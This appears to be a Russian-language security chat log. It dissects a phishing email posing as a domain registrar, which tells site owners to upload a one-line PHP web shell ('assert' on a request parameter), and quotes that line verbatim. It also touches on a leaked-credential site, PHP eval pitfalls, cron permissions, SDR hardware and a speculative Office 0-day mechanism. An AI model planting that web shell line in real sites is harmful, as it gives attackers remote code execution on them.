ачуметь. спасибо!

https://haveibeenpwned.com/

ему, кажись надо не только бинарное значение pwned/safe))))

Яки дивны спамеры, под регистратора косят: Уважаемый клиент! В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом medved.ru осуществляется лицом, указанным в качестве его администратора. Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a139lrkt12z778j4.php со следующим содержимым: <?php assert (stripslashes( $_REQUEST [R01])); ?>

и спам от r01.tech

https://leakedsource.ru

что-то подозрительно

Журналист Bleeping Computer Каталин Кимпану обнаружил на одном из подпольных форумов информацию о сайте LeakedSource, который был заново запущен в доменной зоне .ru. На самом LeakedSource.ru указано, что данный веб-ресурс – это продолжение оригинальной версии. По словам администраторов сайта, они сменили провайдера и регистратора доменных имен. В то же время была утрачена часть контента и потерян доступ к старым серверам и доменам. Как утверждает Кимпану, LeakedSource.ru не является фишинговым и на самом деле дает доступ к утекшей информации.

<?php assert (stripslashes( $_REQUEST [R01])); ?>

а где здесь бекдор?

(сто лет не пиал на php)

assert == eval

ебанись, вообще не очевидно

во всех яп что я видел assert это assert -- проверяет условие и кидает исключение если false

во всех яп что я видел assert это assert -- проверяет условие и кидает исключение если false

тут оно так же работает

во всех яп что я видел assert это assert -- проверяет условие и кидает исключение если false

просто для проверки условия, его надо исполнить)

ну в питоне такое бай дизайн невозможно например

https://habrahabr.ru/post/138443/

ща пособираем команды, чо они там в request слать будут

в этом php-шном коде assert-у в кач-ве аргумента передается строка, интересно какой ебанат дизайнивший язык додумался ее eval-ить

по-хорошему та версия php которая идет в пакетной базе продакшн дистров вообще должна быть запатчена что бы там вообще не было возможности вызвать assert, eval или другое опасное говно

Ну в питоне 2.x была подобная фича с raw_input()

»2. В production environment опция assert.active выключена и аргумент ассерта не вычисляется => злоумышленник ничего не получит.

http://www.rafayhackingarticles.net/2014/08/remote-code-execution-in-php-explained.html http://www.rafayhackingarticles.net/2014/09/indepth-code-execution-in-php-part-two.html 1000 и 1 способ рце в пхп %)

> @Qwerty100500 Ну в питоне 2.x была подобная фича с raw_input() это не так страшно, raw_input подразумевает консольное приложение которое ты ручками запускаешь из командной строки, гипотетический сценарий rce здесь тяжело придумать

а в сферической вебной аппликухе в вакууме raw_input() никто использовать не будет потому что нафига он там

Меня больше "радует" ключ /e в preg_replace

Меня больше "радует" ключ /e в preg_replace

в 7 версии выпилили

но да, это было "гениально"

Привет. посоветуйте. мн нужна крон такска, которая будет выполнять скрипт. при этом, с учетом того, что это деньги 1. возможно ли как-то усложнить возможность редактирования крона (как минимум отключение моей таски и добавление новой) 2. засекурить скрипт сам от модификации. все это на случай компрометации и получения доступа к серверу. ну хотя бы от обычного пользователя, от рута не спастись в целом...

/etc/crontab и так не доступен на редактирование юзеру

т.е. -- твоя просьба не имеет смысла потому что оно из коробки уже так

сделай своему скрипту chmod -w и наслаждайся

в целом логично... спасибо)

/etc/crontab и так не доступен на редактирование юзеру

если быть точным, то будет по одному файлу на юзера в /var/spool/cron/crontabs(зависит от дистро, но в основном тут)

Всем привет, есть тут те кто моторлки удачно перепаиваил и все зависимости правилтно ставил?

Совет нуден

вопрос херовый, переформулируй с моделью и задачей

Моторолка с118 под осмоком, кто сталкивался с этим? Или может мануале на русском есть более подробные

какая ирония

какая ирония

научи его читать английские маны

а перепаивать их зачем?

Моторолка с118 под осмоком, кто сталкивался с этим? Или может мануале на русском есть более подробные

там по первой ссылке хабр

фильтра, что-ли?

ага

фильтра, что-ли?

Фильтра не в обяз перепаивать чтоли?

плюс в вики же просто все описано, хоть она и англоязычная

дякую тобi б-же за blade-rd

* rf

Моторолка с118 под осмоком, кто сталкивался с этим? Или может мануале на русском есть более подробные

https://habrahabr.ru/post/257631/

дякую тобi б-же за blade-rd

https://www.crowdsupply.com/lukas-lao-beyer/freesrp

B200 на другом fpga, наконец-то открытая, радио то же самое, и по цене типа в 420 баксов

https://habrahabr.ru/post/257631/

но здесь далеко не все, читай https://osmocom.org/projects/baseband/wiki

400 баксов не то что бы сильная экономия если сравнивать с лаймом и блейдом

лайм и так продается чуть ли не по себестоимости железа, сделать такого рода платки существенно дешевле мне кажется уже невозможно

лайм - пиздец, разные входы, crosstalk, совершенно непонятные уровни сигнала на передачу

да, наслышан

блейд - увы, тоже есть проблемы

с лаймом вот есть товарищ которого могу хоть завтра поймать

а что там за проблемы кроме головняков с подключением более крутых часов и своего собственного драйвера (сейчас он, правда, уже всем чем только можно поддерживается)?

да и с часами проблема надуманная, во-первых не такие уж и головняки (хотя не так удобно как у B200, это да), во-вторых TCXO c подстройкой по GPS это в сущности блажь для образовательного/исследовательского использования

TCXO печки сами по себе нихера не дешевые

подстройка по gps решается в масштабе 60 баксов на всё

ERROR: S client not available

и что самое главное -- для education/research purposes не особо нужные

штатные 1 pps часы для B200 стоят кстати чуть ли не в два раза дороже чем сам B200

ClockTamer стоит что-то в районе пару сотен кажется

ну так usrp постоянно оверпрайс трёхкратный)

К вопросу о 0-day в ms office word. Может ли это быть коммерческая активность ms? Т.е. не укладываются в планы по переводу людей(продаже) нового офиса и дают команду: "выпускайте кракена". К тому же, пролистав гугл не понял к какому релизу офиса относится уязвимость.

большего бреда относительно 0дей уязвимостей где-либо я еще не слышал

а PoC то есть? А то все пишут, но нихуя не показывают

из того же разряда что и "ав компании сами пишут вирусы что бы их продукты покупали!"

Я люблю теории заговора и не люблю MS, так звезды сошлись

> @cyberpunkych а PoC то есть? А то все пишут, но нихуя не показывают я не ванга, но насколько я понял уязвимость работает следующим образом

у тебя есть офисный документ который подтягивает HTA application с удаленного URL используя соответствующий функционал соответствующего COM/OLE объекта

HTA application делает всякое зло (потому что может) типа shell.run('calc.exe') и ворд при загрузке этого applicatioin-а показывает соответствующий диалог с предложением разрешить или заблокировать

но проблема в том, что в реальной жизни этот HTA application исполняется до того, как пользователь кликнет в этом диалоге что-либо

короче, как-то так

https://threatpost.ru/0-day_microsoft_office_pod_atakoj/21370/

раз и сразу пок) а поискать?

это мое личное предположние исходя из обрывков инфы которую я встречал в тви

@metacat не, это другое совсем

вектора атак из той презы скорее всего не имеют отнощения к этой конкретной уязвимости

к этой конкретной нет, но думаю можно догадаться...

догадаться что?

это вообще о другом

там описывается три класса багов: десериализация, verb action и dll hijacking в com/ole, не похоже что бы хотя бы один из этих классов имел отношение к этому новому 0дею

кстати, все эти три класса уязвимостей в com/ole были вытоптанны почти в ноль за 2013-2015 года

у тебя есть офисный документ который подтягивает HTA application с удаленного URL используя соответствующий функционал соответствующего COM/OLE объекта

Йеп

найти что-то похожее на них в тех компонентах которые шипит сам майкрософт сейчас почти нереально

я думаю что в этом новом эксплойте для загрузки HTA используется COM/OLE объект {3050F5C8-98B5-11CF-BB82-00AA00BDCE0B} и URL передается в него через интерфейс IPersistStream

Сейчас все побегут тестить))

Но нет, не он